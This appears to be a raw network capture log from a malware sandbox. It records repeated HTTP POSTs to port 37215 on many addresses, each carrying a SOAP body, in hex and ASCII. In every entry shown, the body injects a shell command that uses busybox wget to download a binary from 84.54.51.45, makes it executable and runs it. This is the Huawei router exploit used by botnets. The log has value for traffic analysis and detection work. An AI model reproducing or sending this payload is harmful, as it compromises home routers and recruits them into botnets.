78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1751192.168.2.1555300197.145.17.1537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463188887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1752192.168.2.1553374197.190.222.5637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463212013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1753192.168.2.1536170197.125.180.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463231087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1754192.168.2.1542038197.128.105.13637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463249922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1755192.168.2.1540954197.99.4.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463320017 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1756192.168.2.1554678197.44.137.22437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463341951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1757192.168.2.1544324197.77.42.17037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463341951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1758192.168.2.1541574197.94.2.10337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463366985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1759192.168.2.1537936197.61.111.17737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463366985 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1760192.168.2.1538516197.141.112.16437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463371992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1761192.168.2.1542478197.209.78.1337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.463372946 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
